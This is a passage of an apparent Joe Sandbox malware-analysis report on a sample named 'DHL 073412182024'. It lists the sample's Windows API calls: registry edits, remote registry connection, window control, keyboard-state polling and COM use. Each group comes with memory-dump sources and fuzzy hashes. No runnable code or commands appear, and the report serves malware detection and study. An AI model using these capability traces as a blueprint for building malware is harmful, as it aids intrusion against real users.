                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E2CC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2CD48
                                                                                        • Part of subcall function 00E2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E2CCAA
                                                                                        • Part of subcall function 00E2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E2CCBD
                                                                                        • Part of subcall function 00E2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2CCCF
                                                                                        • Part of subcall function 00E2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2CD05
                                                                                        • Part of subcall function 00E2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2CD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2CCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: c32e0c8974fffe7d9fbba8f103ee3b72ffb58d36342ece44c899864f698c1746
                                                                                      • Instruction ID: c4c0cb8f92b9313d329ffdc1b204dc23b92d57506b195c5fb14fc3ed505ad77d
                                                                                      • Opcode Fuzzy Hash: c32e0c8974fffe7d9fbba8f103ee3b72ffb58d36342ece44c899864f698c1746
                                                                                      • Instruction Fuzzy Hash: 8A316B76901128BBDB208B61EC88EEFBF7CEF05744F200165A905F3240DA749A49EBA0
                                                                                      APIs
                                                                                      • timeGetTime.WINMM ref: 00E0E6B4
                                                                                        • Part of subcall function 00DBE551: timeGetTime.WINMM(?,?,00E0E6D4), ref: 00DBE555
                                                                                      • Sleep.KERNEL32(0000000A), ref: 00E0E6E1
                                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00E0E705
                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E0E727
                                                                                      • SetActiveWindow.USER32 ref: 00E0E746
                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E0E754
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E0E773
                                                                                      • Sleep.KERNEL32(000000FA), ref: 00E0E77E
                                                                                      • IsWindow.USER32 ref: 00E0E78A
                                                                                      • EndDialog.USER32(00000000), ref: 00E0E79B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                      • String ID: BUTTON
                                                                                      • API String ID: 1194449130-3405671355
                                                                                      • Opcode ID: 9fc3c274ad9052070c84eaceb06da66974da9ed2eaaa4095c6cd847b309d2dbf
                                                                                      • Instruction ID: ff38a3eafc2b2ffd70fd471719bb72ebcad1a3d82447c21b7493cd1867ced1fc
                                                                                      • Opcode Fuzzy Hash: 9fc3c274ad9052070c84eaceb06da66974da9ed2eaaa4095c6cd847b309d2dbf
                                                                                      • Instruction Fuzzy Hash: 79216570200205BFEB00AF66FC8DA253F69E75474DF242836F51AB12E1DB71DC889B25
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E0EA5D
                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E0EA73
                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E0EA84
                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E0EA96
                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E0EAA7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: SendString$_wcslen
                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                      • API String ID: 2420728520-1007645807
                                                                                      • Opcode ID: 97aec37d4cad75e865b65e494b72eba2fa320df1a90a3cfd75f02e518d41d354
                                                                                      • Instruction ID: c7919ab28f725f1a53b208f48a0fc7fc41a9b76708d31d0054b83798e7dca5d9
                                                                                      • Opcode Fuzzy Hash: 97aec37d4cad75e865b65e494b72eba2fa320df1a90a3cfd75f02e518d41d354
                                                                                      • Instruction Fuzzy Hash: 67117731A9035979D710A765EC4ADFF6B7CEBD6B44F041839B801B20D1EFB04945CAB0
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00E05CE2
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E05CFB
                                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E05D59
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00E05D69
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E05D7B
                                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E05DCF
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E05DDD
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E05DEF
                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E05E31
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E05E44
                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E05E5A
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E05E67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                      • String ID:
                                                                                      • API String ID: 3096461208-0
                                                                                      • Opcode ID: d3817b595ee6a86ba933607f7fbc073ddd551eee520bb8ddc0c1a7e584b6ef01
                                                                                      • Instruction ID: 3c6354c68c286421fe4639ff61b9310c5e980200c77201fbef931016056d2a1e
                                                                                      • Opcode Fuzzy Hash: d3817b595ee6a86ba933607f7fbc073ddd551eee520bb8ddc0c1a7e584b6ef01
                                                                                      • Instruction Fuzzy Hash: C6511CB1A00619AFDB18CF69DD89AAEBBB5EB48700F209129F915F6290D770DE44CF50
                                                                                      APIs
                                                                                        • Part of subcall function 00DB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB8BE8,?,00000000,?,?,?,?,00DB8BBA,00000000,?), ref: 00DB8FC5
                                                                                      • DestroyWindow.USER32(?), ref: 00DB8C81
                                                                                      • KillTimer.USER32(00000000,?,?,?,?,00DB8BBA,00000000,?), ref: 00DB8D1B
                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00DF6973
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DB8BBA,00000000,?), ref: 00DF69A1
                                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DB8BBA,00000000,?), ref: 00DF69B8
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DB8BBA,00000000), ref: 00DF69D4
                                                                                      • DeleteObject.GDI32(00000000), ref: 00DF69E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                      • String ID:
                                                                                      • API String ID: 641708696-0
                                                                                      • Opcode ID: 5cb31e2751571b92b6b6e3a776ef43599bc5e31b62de8a40afc4c98422a09e23
                                                                                      • Instruction ID: e01c04fbd9792517b2a6734ffbb8507c255ad38147253de2217eea5d9e68b400
                                                                                      • Opcode Fuzzy Hash: 5cb31e2751571b92b6b6e3a776ef43599bc5e31b62de8a40afc4c98422a09e23
                                                                                      • Instruction Fuzzy Hash: 5D61AA31501704DFCB25CF2AC948BA57BF5FB40312F288559E287AA960CB71E885EF70
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9944: GetWindowLongW.USER32(?,000000EB), ref: 00DB9952
                                                                                      • GetSysColor.USER32(0000000F), ref: 00DB9862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ColorLongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 259745315-0
                                                                                      • Opcode ID: 1ea075921c9946edc8b5888eed08831aaa5008140900dd3db547b6f2e9f18ffb
                                                                                      • Instruction ID: 7095b14c09d451ecb02731ac1c404038077d2b803c4a951faec7a5e08670ce76
                                                                                      • Opcode Fuzzy Hash: 1ea075921c9946edc8b5888eed08831aaa5008140900dd3db547b6f2e9f18ffb
                                                                                      • Instruction Fuzzy Hash: 10419335104684EFDB215F399C58BF97B75AB06320F288659FAA6A72E1C731DC42DB30
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00DEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00E09717
                                                                                      • LoadStringW.USER32(00000000,?,00DEF7F8,00000001), ref: 00E09720
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00E09742
                                                                                      • LoadStringW.USER32(00000000,?,00DEF7F8,00000001), ref: 00E09745
                                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00E09866
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                      • API String ID: 747408836-2268648507
                                                                                      • Opcode ID: 250757bb3b81695f6e3b8a17653c9f24e638182a143788be4c73cd72943ada3f
                                                                                      • Instruction ID: 6d41abb5bab7aad471c3b2308a33e7363c7ca53fea3dc09b7f7f1dabd1580273
                                                                                      • Opcode Fuzzy Hash: 250757bb3b81695f6e3b8a17653c9f24e638182a143788be4c73cd72943ada3f
                                                                                      • Instruction Fuzzy Hash: 4D413872800219AACF04EBE1DE96DEEB779EF56340F645025F60572092EB356F48CBB1
                                                                                      APIs
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E007A2
                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E007BE
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E007DA
                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E00804
                                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E0082C
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E00837
                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E0083C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                      • API String ID: 323675364-22481851
                                                                                      • Opcode ID: c98bc269f5f2a7a1b70cc96fa1522fdff35340b057fc134003509b0a846f04cc
                                                                                      • Instruction ID: 1027cfc6d76aa8ffc6cf68120b04f20b569b512bf7e0901359054d070b50f613
                                                                                      • Opcode Fuzzy Hash: c98bc269f5f2a7a1b70cc96fa1522fdff35340b057fc134003509b0a846f04cc
                                                                                      • Instruction Fuzzy Hash: D541E372810229AEDF15EBA4DC959EEB778FF44350F544129E911B31A1EB349E48CFA0
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00E23C5C
                                                                                      • CoInitialize.OLE32(00000000), ref: 00E23C8A
                                                                                      • CoUninitialize.OLE32 ref: 00E23C94
                                                                                      • _wcslen.LIBCMT ref: 00E23D2D
                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00E23DB1
                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E23ED5
                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E23F0E
                                                                                      • CoGetObject.OLE32(?,00000000,00E3FB98,?), ref: 00E23F2D
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00E23F40
                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E23FC4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E23FD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 429561992-0
                                                                                      • Opcode ID: e7a49d26368380be9f9df4913b4020bec3c88daa983bd4656936c1e69a2deb72
                                                                                      • Instruction ID: 0d1076885397f5af39ff02f5393e7e126360d180ff3517c9b7d913068ad1bd16
                                                                                      • Opcode Fuzzy Hash: e7a49d26368380be9f9df4913b4020bec3c88daa983bd4656936c1e69a2deb72
                                                                                      • Instruction Fuzzy Hash: F2C176716083159FD700DF28D88496BBBE9FF89748F10591DF98AAB250DB30EE05CB62
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00E17AF3
                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E17B8F
                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00E17BA3
                                                                                      • CoCreateInstance.OLE32(00E3FD08,00000000,00000001,00E66E6C,?), ref: 00E17BEF
                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E17C74
                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00E17CCC
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00E17D57
                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E17D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00E17D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00E17DD6
                                                                                      • CoUninitialize.OLE32 ref: 00E17DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: 6591b9d5af311c51d1a15adf302b2b0068ef3be22820570b1bf6f920767c3f71
                                                                                      • Instruction ID: de28712b82f892f08d5dde120aa2035de6d0487a9e67858003f5aa3b15ead0f5
                                                                                      • Opcode Fuzzy Hash: 6591b9d5af311c51d1a15adf302b2b0068ef3be22820570b1bf6f920767c3f71
                                                                                      • Instruction Fuzzy Hash: 51C13C75A04109AFCB14DF64C888DAEBBF5FF49314B148499F456EB261D730EE85CBA0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E35504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E35515
                                                                                      • CharNextW.USER32(00000158), ref: 00E35544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E35585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E3559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E355AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 1350042424-0
                                                                                      • Opcode ID: fd043c7955e68493c1af0ceed8a55c5377254b3e8aca46f01b5e06bef4b29f5e
                                                                                      • Instruction ID: f9e3a1f266c906f177a3335008143adc103ff14c62143567a80a86bc4d91cb50
                                                                                      • Opcode Fuzzy Hash: fd043c7955e68493c1af0ceed8a55c5377254b3e8aca46f01b5e06bef4b29f5e
                                                                                      • Instruction Fuzzy Hash: D8618B72900608EFDB20CF55CC89AFE7FB9EB0A724F105145F926B6390D7709A84DB61
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DFFAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00DFFB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 00DFFB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DFFB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00DFFB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DFFBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00DFFBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00DFFBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DFFBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 00DFFBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DFFBE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      • Opcode ID: 28f155cf5e134ff85f8f2725833f33346d7839bc700d7410649dc0ad3132a48d
                                                                                      • Instruction ID: 5d124668ccc71b161f3f2a10ec926389bc8467d8d55e572835918e68e4a78da3
                                                                                      • Opcode Fuzzy Hash: 28f155cf5e134ff85f8f2725833f33346d7839bc700d7410649dc0ad3132a48d
                                                                                      • Instruction Fuzzy Hash: B9414E35A0021D9FCB00DFA9D8589BEBBB9EF48354F11C069E956B7261CB30E945CBA0
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00E09CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E09D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00E09D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E09D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00E09D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00E09D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00E09D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00E09DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00E09DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E09DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00E09DEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
